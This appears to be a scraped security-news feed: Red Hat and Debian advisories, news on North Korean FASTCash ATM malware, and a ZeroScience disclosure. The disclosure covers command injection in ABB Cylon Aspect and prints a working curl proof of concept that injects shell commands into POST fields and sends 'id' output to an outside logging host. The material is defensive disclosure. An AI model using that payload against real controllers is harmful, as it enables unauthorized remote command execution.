Red Hat Security Advisory 2024-8161-03 - An update for kernel is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8161.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: kernel security updateAdvisory ID:        RHSA-2024:8161-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8161Issue date:         2024-10-16Revision:           03CVE Names:          CVE-2021-47560====================================================================Summary: An update for kernel is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The kernel packages contain the Linux kernel, the core of any Linux operating system.Security Fix(es):* kernel: kvm: Avoid potential UAF in LPI translation cache (CVE-2024-26598)* kernel: i40e: Do not allow untrusted VF to remove administratively set MAC (CVE-2024-26830)* kernel: udp: do not accept non-tunnel GSO skbs landing in a tunnel (CVE-2024-35884)* kernel: mlxsw: spectrum: Protect driver from buggy firmware (CVE-2021-47560)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2021-47560References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2265801https://bugzilla.redhat.com/show_bug.cgi?id=2275596https://bugzilla.redhat.com/show_bug.cgi?id=2281704https://bugzilla.redhat.com/show_bug.cgi?id=2283389

Red Hat Security Advisory 2024-8161-03

Red Hat Security Advisory 2024-8158-03 - An update for kernel-rt is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include information leakage and null pointer vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8158.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: kernel-rt security update  
Advisory ID:        RHSA-2024:8158-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8158  
Issue date:         2024-10-16  
Revision:           03  
CVE Names:          CVE-2021-47385  
====================================================================

Summary: 

An update for kernel-rt is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: Local information disclosure on Intel(R) Atom(R) processors (CVE-2023-28746)

* kernel: hwmon: (w83792d) Fix NULL pointer dereference by removing unnecessary structure field (CVE-2021-47385)

* kernel: net/sched: taprio: extend minimum interval restriction to entire cycle too (CVE-2024-36244)

* kernel: xfs: fix log recovery buffer allocation for the legacy h_size fixup (CVE-2024-39472)

* kernel: firmware: cs_dsp: Use strnlen() on name fields in V1 wmfw files (CVE-2024-41056)

* kernel: ibmvnic: Add tx check to prevent skb leak (CVE-2024-41066)

* kernel: pinctrl: fix deadlock in create_pinctrl() when handling -EPROBE_DEFER (CVE-2024-42090)

* kernel: sched: act_ct: take care of padding in struct zones_ht_key (CVE-2024-42272)

* kernel: tipc: Return non-zero value from tipc_udp_addr2str() on error (CVE-2024-42284)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2021-47385

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2270700  
https://bugzilla.redhat.com/show_bug.cgi?id=2282355  
https://bugzilla.redhat.com/show_bug.cgi?id=2293654  
https://bugzilla.redhat.com/show_bug.cgi?id=2296067  
https://bugzilla.redhat.com/show_bug.cgi?id=2300430  
https://bugzilla.redhat.com/show_bug.cgi?id=2300442  
https://bugzilla.redhat.com/show_bug.cgi?id=2300552

Red Hat Security Advisory 2024-8158-03

Red Hat Security Advisory 2024-8157-03 - An update for kernel is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include information leakage and null pointer vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8157.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: kernel security update  
Advisory ID:        RHSA-2024:8157-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8157  
Issue date:         2024-10-16  
Revision:           03  
CVE Names:          CVE-2021-47385  
====================================================================

Summary: 

An update for kernel is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

* kernel: Local information disclosure on Intel(R) Atom(R) processors (CVE-2023-28746)

* kernel: hwmon: (w83792d) Fix NULL pointer dereference by removing unnecessary structure field (CVE-2021-47385)

* kernel: net/sched: taprio: extend minimum interval restriction to entire cycle too (CVE-2024-36244)

* kernel: xfs: fix log recovery buffer allocation for the legacy h_size fixup (CVE-2024-39472)

* kernel: firmware: cs_dsp: Use strnlen() on name fields in V1 wmfw files (CVE-2024-41056)

* kernel: ibmvnic: Add tx check to prevent skb leak (CVE-2024-41066)

* kernel: pinctrl: fix deadlock in create_pinctrl() when handling -EPROBE_DEFER (CVE-2024-42090)

* kernel: sched: act_ct: take care of padding in struct zones_ht_key (CVE-2024-42272)

* kernel: tipc: Return non-zero value from tipc_udp_addr2str() on error (CVE-2024-42284)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2021-47385

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2270700  
https://bugzilla.redhat.com/show_bug.cgi?id=2282355  
https://bugzilla.redhat.com/show_bug.cgi?id=2293654  
https://bugzilla.redhat.com/show_bug.cgi?id=2296067  
https://bugzilla.redhat.com/show_bug.cgi?id=2300430  
https://bugzilla.redhat.com/show_bug.cgi?id=2300442  
https://bugzilla.redhat.com/show_bug.cgi?id=2300552

Red Hat Security Advisory 2024-8157-03

Red Hat Security Advisory 2024-8132-03 - An update for libuv is now available for Red Hat Enterprise Linux 8.8 Extended Update Support. Issues addressed include a server-side request forgery vulnerability.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8132.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: libuv security updateAdvisory ID:        RHSA-2024:8132-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8132Issue date:         2024-10-15Revision:           03CVE Names:          CVE-2024-24806====================================================================Summary: An update for libuv is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:libuv is a multi-platform support library with a focus on asynchronous I/O. Security Fix(es):* libuv: Improper Domain Lookup that potentially leads to SSRF attacks (CVE-2024-24806)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-24806References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2263292

Red Hat Security Advisory 2024-8132-03

Red Hat Security Advisory 2024-8120-03 - An update for java-11-openjdk is now available for Red Hat Enterprise Linux 7 Extended Lifecycle Support. Issues addressed include buffer overflow and integer overflow vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8120.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: java-11-openjdk security update  
Advisory ID:        RHSA-2024:8120-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8120  
Issue date:         2024-10-16  
Revision:           03  
CVE Names:          CVE-2023-48161  
====================================================================

Summary: 

An update for java-11-openjdk is now available for Red Hat Enterprise Linux 7 Extended Lifecycle Support.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The java-11-openjdk packages provide the OpenJDK 11 Java Runtime Environment and the OpenJDK 11 Java Software Development Kit.

Security Fix(es):

* giflib: Heap-Buffer Overflow during Image Saving in DumpScreen2RGB Function (CVE-2023-48161)

* JDK: Array indexing integer overflow (8328544) (CVE-2024-21210)

* JDK: HTTP client improper handling of maxHeaderSize (8328286) (CVE-2024-21208)

* JDK: Unbounded allocation leads to out-of-memory error (8331446) (CVE-2024-21217)

* JDK: Integer conversion error leads to incorrect range check (8332644) (CVE-2024-21235)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-48161

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2251025  
https://bugzilla.redhat.com/show_bug.cgi?id=2318524  
https://bugzilla.redhat.com/show_bug.cgi?id=2318526  
https://bugzilla.redhat.com/show_bug.cgi?id=2318530  
https://bugzilla.redhat.com/show_bug.cgi?id=2318534

Red Hat Security Advisory 2024-8120-03

Red Hat Security Advisory 2024-8112-03 - An update for buildah is now available for Red Hat Enterprise Linux 9.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8112.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: buildah security update  
Advisory ID:        RHSA-2024:8112-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8112  
Issue date:         2024-10-16  
Revision:           03  
CVE Names:          CVE-2024-9341  
====================================================================

Summary: 

An update for buildah is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The buildah package provides a tool for facilitating building OCI container images. Among other things, buildah enables you to: Create a working container, either from scratch or using an image as a starting point; Create an image, either from a working container or using the instructions in a Dockerfile; Build both Docker and OCI images. 

Security Fix(es):

* go/parser: golang: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion (CVE-2024-34155)

* encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion (CVE-2024-34156)

* go/build/constraint: golang: Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion (CVE-2024-34158)

* Podman: Buildah: cri-o: FIPS Crypto-Policy Directory Mounting Issue in containers/common Go Library (CVE-2024-9341)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-9341

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2310527  
https://bugzilla.redhat.com/show_bug.cgi?id=2310528  
https://bugzilla.redhat.com/show_bug.cgi?id=2310529  
https://bugzilla.redhat.com/show_bug.cgi?id=2315691

Red Hat Security Advisory 2024-8112-03

The thieves modify transaction messages to initiate unauthorized withdrawals, even when there are insufficient funds.

Source: Panther Media GmbH via Alamy Stock Photo

North Korean threat actors are using a Linux variant from a malware family known as "FASTCash" to conduct a financially motivated cyber campaign.

FASTCash is a payment switch malware, first documented by the US government in October 2018 when it was being used by North Korean adversaries in an ATM scheme targeting banks in Africa and Asia.

Since that time, there have been two significant developments within the campaign. The first is its capability to conduct the scheme against banks hosting their switch application on Windows Server, and the second is its expansion of the campaign to target interbank payment processors.

Prior versions of the malware targeted systems running Microsoft Windows and IBM AIX, though the latest findings of the malware now indicate that it is designed to infiltrated Linux systems.

The malware modifies ISO 8583 transaction messages used in debit and credit card transactions to initiate unauthorized withdrawals, even managing to manipulate declined transactions due to insufficient funds, then approve them to withdraw money in Turkish currency ranging from 12,000 to 30,000 lira ($350 to $875).

"The process injection technique employed to intercept the transaction messages should be flagged by any commercial \[endpoint detection and response\] or opensource Linux agent with the appropriate configuration to detect usage of the ptrace system call," noted the researchers in the report.

The researchers also highlight Cybersecurity and Infrastructure Security Agency (CISA) recommendations of implementing chip and PIN requirements for debit cards, requiring and verifying message authentication codes on issue financial request response messages, and performing authorization response cryptogram validation for chip and PIN transactions to prevent exploitation attempts.

**About the Author**

North Korea Hackers Get Cash Fast in Linux Cyber Heists

North Korean threat actors have been observed using a Linux variant of a known malware family called FASTCash to steal funds as part of a financially-motivated campaign.
The malware is "installed on payment switches within compromised networks that handle card transactions for the means of facilitating the unauthorized withdrawal of cash from ATMs," a security researcher who goes by HaxRob said.

North Korean threat actors have been observed using a Linux variant of a known malware family called **FASTCash** to steal funds as part of a financially-motivated campaign.

The malware is "installed on payment switches within compromised networks that handle card transactions for the means of facilitating the unauthorized withdrawal of cash from ATMs," a security researcher who goes by HaxRob said.

FASTCash was first documented by the U.S. government in October 2018 as used by adversaries linked to North Korea in connection with an ATM cashout scheme targeting banks in Africa and Asia since at least late 2016.

"FASTCash schemes remotely compromise payment switch application servers within banks to facilitate fraudulent transactions," the agencies noted at the time.

"In one incident in 2017, HIDDEN COBRA actors enabled cash to be simultaneously withdrawn from ATMs located in over 30 different countries. In another incident in 2018, HIDDEN COBRA actors enabled cash to be simultaneously withdrawn from ATMs in 23 different countries."

While prior FASTCash artifacts have systems running Microsoft Windows (including one spotted as recently as last month) and IBM AIX, the latest findings show that samples designed for infiltrating Linux systems were first submitted to the VirusTotal platform in mid-June 2023.

The malware takes the form of a shared object ("libMyFc.so") that's compiled for Ubuntu Linux 20.04. It's designed to intercept and modify ISO 8583 transaction messages used for debit and credit card processing in order to initiate unauthorized fund withdrawals.

Specifically, it entails manipulating declined (magnetic swipe) transaction messages due to insufficient funds for a predefined list of cardholder account numbers and approving them to withdraw a random amount of funds in Turkish Lira.

The funds withdrawn per fraudulent transaction range from 12,000 to 30,000 Lira ($350 to $875), mirroring a Windows FASTCash artifact ("switch.dll") previously detailed by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) in September 2020.

"\[The\] discovery of the Linux variant further emphasizes the need for adequate detection capabilities which are often lacking in Linux server environments," the researcher said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Linux Variant of FASTCash Malware Targets Payment Switches in ATM Heists

Debian Linux Security Advisory 5792-1 - The following vulnerabilities have been discovered in the WebKitGTK web engine. Hafiizh and YoKo Kho discovered that visiting a malicious website may lead to address bar spoofing. Narendra Bhati discovered that a malicious website may exfiltrate data cross-origin.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5792-1                   security@debian.org  
https://www.debian.org/security/                           Alberto Garcia  
October 14, 2024                      https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : webkit2gtk  
CVE ID         : CVE-2024-40866 CVE-2024-44187

The following vulnerabilities have been discovered in the WebKitGTK  
web engine:

CVE-2024-40866

    Hafiizh and YoKo Kho discovered that visiting a malicious website  
    may lead to address bar spoofing.

CVE-2024-44187

    Narendra Bhati discovered that a malicious website may exfiltrate  
    data cross-origin.

For the stable distribution (bookworm), these problems have been fixed in  
version 2.46.0-2~deb12u1.

We recommend that you upgrade your webkit2gtk packages.

For the detailed security status of webkit2gtk please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/webkit2gtk

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEYrwugQBKzlHMYFizAAyEYu0C2AIFAmcNkVcACgkQAAyEYu0C  
2AIS8g/9EKZzBT0VW5VA4kCzLSijtpyKw+kDKgVbsFQmDudoYfr1xF1syfyw1y9r  
RwdUi5q2puDKenEBk1kg3xRUkVM0HCbzCVt/h6mmx6YaBjKVAl95syXiWyDnXoOI  
7e4WnzAtUgsNfx4+zpTqNdfK/982C/Zfc2kuit2iXiBDcCYtdBWV3+k8vbbT4Om5  
2MYrbxlQlyUXEc9ZZpaAUxTvuklSQ2wHK3xtlAmoxsMdj2+Re9bOKuBuOKZkUfwU  
9olgKg83HWhzc5W4u840q8oHmUrZDUpNbLjQGTSBZWVQE0uAiD8IA8k4I/TxjPFm  
MyeSRKKE0QTCOPDyHskVW+ijjcqs8pHa9/jAwXO/cBO6ZBkSbnQZ57j4+CQtrzA5  
N0Yh02AM48898eRDXhlt2SBz+tQnlhs0vSRMacccbIy0GSlccSoiaJRsUFXZ+LOb  
JiM8xlbJ8KsKJz/pTOM6qzrIkD/RFmqBrxIutPqsusG+XbiVQkvcQp13otfTK8Pk  
hzGC47UBZuuUib8DXkYSgbb0b/cw6/efIwy60NpPsT7DxfjLwCyVspyQcjJplGAN  
Lou0R6ezpNQu9iijjeJZR6DouiYP0YGoLm8bVo0OBIsw0tmO7vZ82SBi6Rf7ScIB  
Hu190dDPt2WdNigXxpGmjk+nWyj7DncEZEfwKQb/rZos52hPh/Q=  
=pvja  
-----END PGP SIGNATURE-----

Debian Security Advisory 5792-1

ABB Cylon Aspect version 3.08.00 suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the country, state, locality, organization, and hostname HTTP POST parameters called by the sslCertAjax.php script.

    ABB Cylon Aspect 3.08.00 (sslCertAjax.php) Remote Code ExecutionVendor: ABB Ltd.Product web page: https://www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio                  Firmware: <=3.08.00Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices.Desc: The ABB BMS/BAS controller suffers from an authenticated OS commandinjection vulnerability. This can be exploited to inject and execute arbitraryshell commands through the 'country', 'state', 'locality', 'organization', and'hostname' HTTP POST parameters called by the sslCertAjax.php script.Tested on: GNU/Linux 3.15.10 (armv7l)           GNU/Linux 3.10.0 (x86_64)           GNU/Linux 2.6.32 (x86_64)           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz           PHP/7.3.11           PHP/5.6.30           PHP/5.4.16           PHP/4.4.8           PHP/5.3.3           AspectFT Automation Application Server           lighttpd/1.4.32           lighttpd/1.4.18           Apache/2.2.15 (CentOS)           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2024-5842Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5842.php21.04.2024--$ cat project                 P   R   O   J   E   C   T                        .|                        | |                        |'|            ._____                ___    |  |            |.   |' .---"|        _    .-'   '-. |  |     .--'|  ||   | _|    |     .-'|  _.|  |    ||   '-__  |   |  |    ||      |     |' | |.    |    ||       | |   |  |    ||      | ____|  '-'     '    ""       '-'   '-.'    '`      |____░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░          ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░          ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░          ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ $ curl -X POST "http://192.168.73.31/sslCertAjax.php" \> -H "Cookie: PHPSESSID=xxx" \> -d "opType=genCert\> &country=`sleep 1`\> &state=`sleep 2`\> &locality=`sleep 3`\> &organization=`sleep 4`\> &hostname=ZSL$(curl -A `id` remotelog.zeroscience.mk)" ; ./incom -l httplog &<div>Certificate Generation Successful</div>[1]  + 50123 done       incom$$ cat httplog------ remotelog ------GET / HTTP/1.1User-Agent: uid=33(www-data)Host: remotelog.zeroscience.mkAccept: */*------ remotelog ------$ shutdown -h +17 "Good afternoon, good evening and good night."

Tag

#linux